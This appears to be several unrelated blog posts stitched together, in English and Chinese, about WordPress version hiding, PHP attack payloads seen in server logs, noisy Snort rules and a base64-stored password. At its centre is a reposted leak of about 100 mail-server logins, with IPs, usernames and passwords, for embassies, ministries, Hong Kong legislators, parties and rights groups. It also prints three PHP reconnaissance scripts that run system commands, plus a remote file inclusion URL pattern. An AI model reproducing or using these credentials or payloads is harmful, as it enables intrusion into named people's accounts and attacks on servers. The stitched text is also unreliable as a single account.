For example, such HTML is usually found in blog header:

<meta name="generator" content="WordPress 2.6.5" />

Broadcasting version is generally believed to be a sore point in blog security — it invited crackers to determine easily which blog is exploitable, thus the existance of such plugins. It reminds me about a plugin I have written for myself before, for similar purpose. But on second thought, I didn’t publish and advertise it. Why?

Version can be decided though other means

Since recent WordPress releases (not very recent though), WordPress also emit versions in javascript links. Take my own blog for example:

<script type='text/javascript' src='http://me.abelcheung.org/wp-includes/js/prototype.js?ver=1.6'></script>
<script type='text/javascript' src='http://me.abelcheung.org/wp-includes/js/scriptaculous/wp-scriptaculous.js?ver=1.8.0'></script>
<script type='text/javascript' src='http://me.abelcheung.org/wp-includes/js/scriptaculous/effects.js?ver=1.8.0'></script>
<script type='text/javascript' src='http://me.abelcheung.org/wp-includes/js/jquery/jquery.js?ver=1.2.6'></script>

With javascript versioning, WordPress version can be approximately determined. Even worse, these declarations can’t be disabled. That means just hiding WordPress version is not effective anymore, regardless of other reasons.

Exploits are generic enough to ignore any versioning

While WordPress fanboys are retarded enough to declare any security measure as “obscurity”, this one is probably right. Version hiding is very likely defenceless against most exploits, which simply tries every possible attack method. This renders version hiding pointless.

It affects functionality of other plugins

Some other plugins do check WordPress version in order to behave differently. Take a look at the comment of bs-wp-noversion plugin (which is yet another version hiding plugin). WordPress rendered broken is a possibility if version is changed or hidden.

還想 WordPress 做 audit 的真在太妄想，至少兩年半前投訴到現在，要做的早做了。phpNuke，phpBB，WordPress 這老中青三代都該永久擁有這個獎，以誌它們將 OSS 的 many eyeball theory 徹底推翻。

<?
echo "BraT<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "NigeriaN HackerS TeaM<br>";
exit;
?>

另一個也差不多：

<?php
function ConvertBytes($number)
{
        $len = strlen($number);
        if($len < 4)
        {
                return sprintf("%d b", $number);
        }
        if($len >= 4 && $len <=6)
        {
                return sprintf("%0.2f Kb", $number/1024);
        }
        if($len >= 7 && $len <=9)
        {
                return sprintf("%0.2f Mb", $number/1024/1024);
        }
        return sprintf("%0.2f Gb", $number/1024/1024/1024);
}

echo "kangkung<br>";
$un = @php_uname();
$up = system(uptime);
$id1 = system(id);
$pwd1 = @getcwd();
$sof1 = getenv("SERVER_SOFTWARE");
$php1 = phpversion();
$name1 = $_SERVER['SERVER_NAME'];
$ip1 = gethostbyname($SERVER_ADDR);
$free1= diskfreespace($pwd1);
$free = ConvertBytes(diskfreespace($pwd1));
if (!$free) {$free = 0;}
$all1= disk_total_space($pwd1);
$all = ConvertBytes(disk_total_space($pwd1));
if (!$all) {$all = 0;}
$used = ConvertBytes($all1-$free1);
$os = @PHP_OS;

echo "kangkung was here ..<br>";
echo "uname -a: $un<br>";
echo "os: $os<br>";
echo "uptime: $up<br>";
echo "id: $id1<br>";
echo "pwd: $pwd1<br>";
echo "php: $php1<br>";
echo "software: $sof1<br>";
echo "server-name: $name1<br>";
echo "server-ip: $ip1<br>";
echo "free: $free<br>";
echo "used: $used<br>";
echo "total: $all<br>";
exit;

再來第三個，都是一樣的東西：

<?
echo "ALBANIA<br>";
$alb = @php_uname();
$alb2 = system(uptime);
$alb3 = system(id);
$alb4 = @getcwd();
$alb5 = getenv("SERVER_SOFTWARE");
$alb6 = phpversion();
$alb7 = $_SERVER['SERVER_NAME'];
$alb8 = gethostbyname($SERVER_ADDR);
$alb9 = get_current_user();
$os = @PHP_OS;
echo "os: $os<br>";
echo "uname -a: $alb<br>";
echo "uptime: $alb2<br>";
echo "id: $alb3<br>";
echo "pwd: $alb4<br>";
echo "user: $alb9<br>";
echo "phpv: $alb6<br>";
echo "SoftWare: $alb5<br>";
echo "ServerName: $alb7<br>";
echo "ServerAddr: $alb8<br>";
echo "UNITED ALBANIANS aka ALBOSS PARADISE<br>";
exit;
?>

特別之處是，它們非常針對 PHP，嘗試哄騙 PHP 信任攻擊者提供的 DOCUMENT_ROOT 來取代 Apache 那個，全部都是在 URL 後加上像 "?DOCUMENT_ROOT=http://www.example.com/xxxxxx.txt" 的部份，而且這個所謂的 .txt 其實是 PHP 檔。我和這位仁兄一樣，一時間找不到是哪個漏洞會用 DOCUMENT_ROOT。

在 User Agent 方面，九成九都是 libwww-perl，看到比較得人驚的只有這個。希望是偽造的吧，如果是真的，那就笑不出了，因為那表示這個攻擊無遠弗屆……

Here is a list with working passwords to exactly 100 email-accounts to Embassies and Governments around the world. Yes it’s the real deal and still working when we are posting this. So why in the world would anyone publish this kind of information? Because seriously, I’m not going to call the president of Iran and tell him that I got access to all their embassies. I’m DEranged, not suicidal! He has bombs and stuff…

Experience tells me that even if I would contact everyone on this list most are not going to listen or perhaps just blame me for being an evil hacker and that no one else would ever find this out. WTF does it take for people to learn!?

Can’t throw it away, it’s only a matter of time until someone else gets the same information. Or wait, does someone else have this already? For how long have they had it? What are they doing with it?

Selling it would probably make me a fair amount of money but that ain’t my style and I’m sure people have disappeared for less.

After trying every scenario in my head I end up dead, in jail or worse.

So fuck it! Here is everything you need to read classified email and fuck up some serious International business. Hopefully this will put light on the security problems that are never talked about and get at least this fixed with a speed that you never seen your government work before. As a Swedish citizen I can’t give this information to anyone without getting into trouble, so instead I’m giving it to everyone.

I would like to remind everyone that using ANY of this is a serious crime and I trust that nothing here will be used, ever! If you do anyway you are a fucker, idiot, moron, lamer, scriptkiddie, criminal and obviously don’t get the point of this publishing. Private and company accounts gathered are NOT published, we will NEVER put a threat on your company or personal life!

The thousands of classified mail we have read however are for our own pleasure only so MUST or any such organizations don’t even bother, they are GONE! Any raid of my place will only find you loads of beer and prove that you don’t get the point of DEranged. Swedish cops need more resources and not more job.

Now let’s see how many angry mails I will get before I get my free vacation to Guantanamo Bay paid by Mr. Bush.

//D

Who | IP to pop3 | Login | Password

Indian Embassy in Sweden 81.228.8.31 u81004859 Brdv8H5j

Russian Embassy in Sweden 81.228.11.36 u86119749 y9z8ApZp
Kazakhstan Embassy in Russia 81.176.67.157 akmaral@kazembassy.ru 86rb43
Kazakhstan Embassy in Russia 81.176.67.157 alla@kazembassy.ru vhs35
Kazakhstan Embassy in Russia 81.176.67.157 askarest@kazembassy.ru dol57
Kazakhstan Embassy in Russia 81.176.67.157 b.kuatbekova@kazembassy.ru bk145
Kazakhstan Embassy in Russia 81.176.67.157 baimenche@kazembassy.ru 1956
Kazakhstan Embassy in Russia 81.176.67.157 den@kazembassy.ru bek70
Kazakhstan Embassy in Russia 81.176.67.157 emo@kazembassy.ru art35
Kazakhstan Embassy in Russia 81.176.67.157 galikhin@kazembassy.ru aGC4jyf

The Office of Dalai Lama 65.19.137.2 tlc@dalailama.com tsephell
The Office of Dalai Lama 65.19.137.2 tntaklha@dalailama.com dudul5425
The Office of Dalai Lama 65.19.137.2 chhimerigzing@dalailama.com ylypp610
Indian Embassy in Oman 65.109.245.38 da da01877y
Uzbekistan Consulate in France 57.66.151.179 Parij_C p2a2r0i9j
Uzbekistan Consulate in Germany 57.66.151.179 Berlin_C b5a6h7o8r9
Uzbekistan Consulate in India 57.66.151.179 Dehli_C i1n9d5u6
Uzbekistan Consulate in New York 57.66.151.179 Nyu_York_UN t2r7d31ln8
Uzbekistan Consulate in South Korea 57.66.151.179 Seul_C s1e7u0l7c

Uzbekistan Consulate in USA 57.66.151.179 Vashington_c s7a9s5h3a1
Uzbekistan Embassy in Afghanistan 57.66.151.179 AfghanQ a1f2g3h4a5n6q
Uzbekistan Embassy in Afghanistan 57.66.151.179 afghanm a1f1g0h1a0n2m
Uzbekistan Embassy in Belgium 57.66.151.179 Bryussel b1r3y0u2s1
Uzbekistan Embassy in China 57.66.151.179 Pekin e1q8b3n7a2
Uzbekistan Embassy in Dubai 57.66.151.179 dubay b2r7s1d3y4
Uzbekistan Embassy in France 57.66.151.179 Parij u3t1k9i6r2
Uzbekistan Embassy in Germany 57.66.151.179 Frankfurt a8h7f6y5r4
Uzbekistan Embassy in Indonesia 57.66.151.179 jakarta t2d7j3a4m9

Uzbekistan Embassy in Israel 57.66.151.179 Tel_Aviv m1u9z5r6ob
Uzbekistan Embassy in Japan 57.66.151.179 Tokio h5o6n7d8a9
Uzbekistan Embassy in Kuwait 57.66.151.179 kuwait k3u0w0a1i0t6
Uzbekistan Embassy in Kyrgyzstan 57.66.151.179 bishkek a1h4e0y2p1
Uzbekistan Embassy in Latvia 57.66.151.179 Riga z8e2t7w1×5
Uzbekistan Embassy in Malaysia 57.66.151.179 Malayziya g6h8w0e2d3
Uzbekistan Embassy in Pakistan 57.66.151.179 Islomobod y7j2l3b8h1
Uzbekistan Embassy in Poland 57.66.151.179 varshava p0o4l1s1h0a3

Uzbekistan Embassy in Russia 57.66.151.179 Moskva z1a8f0a2r1
Uzbekistan Embassy in Saudi Arabia 57.66.151.179 Jidda j3i1d7d9a5
Uzbekistan Embassy in South Korea 57.66.151.179 seul z1y9×2e0le
Uzbekistan Embassy in Thailand 57.66.151.179 Bangkok n7o8d2i0r5
Uzbekistan Embassy in The Netherlands 57.66.151.179 Amsterdam h1o5l0a2n1
Uzbekistan Embassy in Turkey 57.66.151.179 Anqara g5s2b7×1o4
Uzbekistan Embassy in Turkey 57.66.151.179 Istanbul b5c2n3f4v1
Uzbekistan Embassy in Turkmenistan 57.66.151.179 Ashxobod d7o1m5l6a2

Uzbekistan Embassy in Ukraine 57.66.151.179 Kiev s5c4h3u2h1
Uzbekistan Embassy in United Kingdom 57.66.151.179 London w9r3y7g4d1
Uzbekistan Embassy in United Kingdom 57.66.151.179 London_Elchi l9o8n7d6n5
Uzbekistan Embassy in USA 57.66.151.179 vashington_m e1r2k3i4n5
Uzbekistan Embassy in Uzbekistan 57.66.151.179 toshkent epyan2006
Uzbekistan Embassy in Uzbekistan 57.66.151.179 Toshkent_M 3456789
Uzbekistan Foreign Affairs 57.66.151.179 Qohira 5gx7n1e4w9
Iran Embassy in Ghana 217.172.99.19 iranemb_accra@mfa.gov.ir accra
Iran Embassy in Kenya 217.172.99.19 iranemb_kenya@mfa.gov.ir kenya

Iran Embassy in Oman 217.172.99.19 iranemb_muscat@mfa.gov.ir muscat
Iran Embassy in Tunisia 217.172.99.19 iranemb_tunisia@mfa.gov.ir tunisia
Iran Ministry of Foreign Affairs 217.172.99.19 bagheripour@mfa.gov.ir amir1368
Kazakhstan Embassy in Italy 213.21.159.23 kazakstan.emb@agora.it rfywkth
Kazakhstan Embassy in Egypt 213.131.64.229 kazaemb piramid
Kyrgyztan Embassy in Iran 212.42.96.15 embiran asdfgh
Kyrgyztan Embassy in kazakhstan 212.42.96.15 kaz_emb W34#eEDd
Indian Embassy in Italy 212.34.224.157 m0006614 srpq86m
Indian Embassy in Belgium 212.100.160.114 commercial@indembassy.be india01

Mongolian Embassy in USA 209.213.221.249 esyam@mongolianembassy.us temp
Mongolian Embassy in USA 209.213.221.249 j.mendee@mongolianembassy.us temp
Mongolian Embassy in USA 209.213.221.249 n.tumenbayar@mongolianembassy.us temp
UK Visa Application Centre in Nepal 208.109.119.54 vfsuknepal@vfs-uk-np.com Password
Kazakhstan Embassy in Japan 203.216.5.113 embkazjp nf5!3LeG
India National Defence Academy 203.199.162.245 mis misadmin
Hong Kong Human Rights Monitor 203.161.254.182 po@hkhrm.org.hk T5a*4V#K
Hong Kong Legislative Council member 203.124.10.110 billywong@mandytam.com 232880
Hong Kong Legislative Council member 203.124.10.110 tim@mandytam.com 220866

Hong Kong Legislative Council member 202.66.159.18 poppy@ronnytong.org rtppy346
One Country Two Systems Research Institute of China 202.66.107.12 kenchan@octs.org.hk 153kenchan
Liaison Office of the Dalai Lama for Japan & East-Asia 202.208.210.8 tibet02 TIBET310
Hong Kong Legislative Council member 202.181.132.82 margaret@margaretng.com sarah#
Hong Kong Legislative Council member 202.181.132.68 hazelpun@sinchungkai.org.hk 9cxh6gpy
Hong Kong Legislative Council member 202.181.132.68 chungkai@sinchungkai.org.hk Yvonne0328
Hong Kong Democratic Party 202.177.28.170 twk@dphk.org password
Hong Kong Liberal Party 202.123.79.164 miriamlau 123456

Hong Kong Liberal Party 202.123.79.164 tinyan 12345678
Hong Kong Liberal Party 202.123.79.164 pauline 25334264
Hong Kong Liberal Party 202.123.79.164 wilkin x105×10a
Hong Kong Liberal Party 202.123.79.164 joy 26606624
Hong Kong Association for Democracy & People’s Livelihood Party 202.123.216.231 hmt@adpl.org.hk hmt27622676
Hong Kong Association for Democracy & People’s Livelihood Party 202.123.216.231 info@adpl.org.hk info27823137

Hong Kong Association for Democracy & People’s Livelihood Party 202.123.216.231 iggyng@adpl.org.hk igg27823137
Hong Kong Association for Democracy & People’s Livelihood Party 202.123.216.231 fcc@adpl.org.hk fcc22674595
Indian Embassy in China 202.109.110.87 amb@indianembassy.org.cn 1234
Indian Embassy in China 202.109.110.87 amboff@indianembassy.org.cn 1234
Tajikistan Embassy in China 202.106.46.87 tjkemb w4u7e3a2
Indian Embassy in Germany 194.95.249.247 rb1002p1 consind1
Indian Embassy in Germany 194.95.249.247 rb1002p15 com15ind

Kazakhstan Consulate General in China 194.67.23.102 kzconsulshanghai 987654
Japan Embassy in ? 194.226.128.37 emb_japan_ast4 123456
Indian Embassy in Finland 193.229.0.46 kv7198 npyrhdjj
Hong Kong Goverment Information Service Department Goverment 147.8.219.202 erika.chau 60777699
China Civil Human Right Front 123.242.224.80 contact@civilhrfront.org 17891894
China Civil Human Right Front 123.242.224.80 secretariat@civilhrfront.org 17891894
Defence Research & Development Organisation Govt. Of India, Ministry of Defence jpsingh@drdo.com password+1
Indian Embassy in USA amb@indianembassy.org 1234

Sorry for the bad layout, we will have to fix that =)

不用找 decoder 了，Y2NuOTExNQ== 用 base64 碼還原後是 ccn9115，是我其中一個電郵戶口開戶時的密碼。我有三年沒碰過 evolution 了，所以密碼還保留着。那它靠甚麼來保護？原來是檔案權限。

既然檔案權限就「足夠了」，又為甚麼要無聊到畫蛇添足，用 base64？沒人知道了。也許想和 outlook 兼容吧？

 # of  from             to               method
=========================================================================
   xx  xxx.xxx.xxx.xxx   202.134.73.141   WEB-MISC robots.txt access
   xx  xxx.xxx.xxx.xxx   202.134.73.141   WEB-MISC robots.txt access
......

OK, 讀 robots.txt 是很正常的一回事，很清楚那是 false alarm，但前幾天的 log 都有兩個不尋常的項目：

 # of  from             to               method
=========================================================================
   xx  xxx.xxx.xxx.xxx  202.134.73.141   WEB-PHP Mambo upload.php access
   xx  xxx.xxx.xxx.xxx  202.134.73.141   WEB-PHP IGeneric Free Shopping Cart page.php access

不單止數目都很高，最要命的是：全部都是我家中的 IP 地址發出的？因為 ISP 的緣故，家中的 IP 每天會改至少一次，但 log 裏的 IP address 和日期全部吻合！那時心就慌了，會不會是我的電腦被種了木馬而自己不知道？特別是近幾天都在用 flock，不會是被人借 flock 入侵吧？想想不對頭，立即將 flock 關掉。(現在想來，自己也覺自己可笑)

之後再看，還有更令我膽顫心驚的：

 # of  from             to               method
=========================================================================
   xx  xxx.xxx.xxx.xxx  202.134.73.141   MISC rsyncd overflow attempt

令我嚇壞的是，剛好我在那一天用過 rsync。其它日子沒有用過 rsync，也沒有這一句。第一個念頭：我的電腦被種了 keylogger，所以我用過甚麼服務全被人知道了？所有戶口的密碼怎麼辦？完了。

過一會後，再定下心神，想想有沒有別的可能性。抱着最後一絲希望，去看看這些警告代表甚麼意思。在 有關的 snort 規則中的全文是：

妖～!果然全部是 false alarm。上面設定的意思是，只要詢問 web server 的 URL 中含有 “/page.php” 或 “/upload.php”，就會發出警報。這算甚麼？這世界上有 page.php 或 upload.php 的軟件何其多！恐怕 snort 還有不少這類漁翁撒網的規則吧。

而且 email 中完全不會提任何事件有多嚴重，不會分辨甚麼是 activity、甚麼是 attack，而且將 robots.txt 歸在比 IIS unicode attack 還重要的分類…… 我不知道預設用這種爛設定是為了讓商業軟件有生存空間，還是為了要提醒人必須更改設定以適合自己的需要，但這種爛設定真是會嚇壞新手的。不論如何，這幾句立即就被我用 suppress 去掉了：

suppress gen_id 1, sig_id 1852
suppress gen_id 1, sig_id 2077
suppress gen_id 1, sig_id 2410

總之就像 Vista 的 UAC 一樣，日日都是狼來了。

不過再想一下，其實是很正常的。香港人用甚麼態度對待保安問題，有目共睹。Foxy? 媒體炒作的好對象，千夫所指，但有誰會花半秒想想自己？因為是政府才那麼多報紙雜誌攻擊而已，同樣的事，各大小辦公室 + 學校每天不知多少宗，不是依舊一樣？有病毒？有人入侵電腦？電腦還能動呀，管它那麼多？等 hang 機才算吧，反正到時 reboot 便沒事了。偷資料？我看不見，我看不見。認識的人中，有不少都是這樣，直到最後連我自己都一起緊貼社會潮流了。So fashionable.

完全不是如文中所說，因為網域登記公司監管不力，致使網站充滿惡意 ActiveX, JavaScript, worms 等一大堆問題。雖然是流氓公司，但這類問題，那班只會等收錢的人是管不着的。